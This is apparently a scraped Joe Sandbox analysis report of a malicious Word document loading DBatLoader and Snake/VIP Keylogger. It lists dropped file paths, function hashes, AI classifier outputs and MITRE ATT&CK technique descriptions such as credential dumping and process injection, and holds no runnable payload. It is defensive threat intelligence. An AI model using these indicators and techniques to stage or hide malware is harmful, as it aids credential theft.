Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(1C761680), ref: 00414050

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

IsProcessorFeaturePresent, xrefs: 0041361F
KERNEL32, xrefs: 00413610

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMON

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000001.2243005056.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000001.2243005056.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_1_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Function 1F9057A0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;sq, xrefs: 1F9057B6
\;sq, xrefs: 1F9057DE
\;sq, xrefs: 1F9057AC
\;sq, xrefs: 1F9057D2

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: \;sq$\;sq$\;sq$\;sq
API String ID: 0-2251010532
Opcode ID: 4b23c7287a81d639d7303150b642becf6d73cb0a78463e13078472c287ef7526
Instruction ID: a2e2d67ee59952eccfbe456604ef4f5c42fb5d068cde4766bc5d7f6ac0206385
Opcode Fuzzy Hash: 4b23c7287a81d639d7303150b642becf6d73cb0a78463e13078472c287ef7526
Instruction Fuzzy Hash: 0E017875B14115CFC729BA3DC48490A77EEAFC8760721826EE900CB3E1EE30EC41A790

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown
URL: Office document Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PROTECTED DOCUMENT", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Office document Model: Joe Sandbox AI	{ "brands": [ "Microsoft Word" ] }
	{ "brands": [ "Microsoft Word" ] }
URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PROTECTED DOCUMENT", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "brands": [ "Microsoft Word" ] }
	{ "brands": [ "Microsoft Word" ] }

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PI ITS15235 (2).doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Libraries\FX.cmd

C:\Users\Public\Libraries\NEO.cmd

C:\Users\Public\Libraries\Nsltarpn

C:\Users\Public\Libraries\Nsltarpn.PIF

C:\Users\Public\Libraries\YKA

C:\Users\Public\Libraries\npratlsN.pif

C:\Users\Public\Nsltarpn.url

C:\Users\Public\NsltarpnF.cmd

C:\Users\user\AppData\Local\Temp\~DFCFF1A1E34A46A163.TMP

Windows Analysis Report
PI ITS15235 (2).doc

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre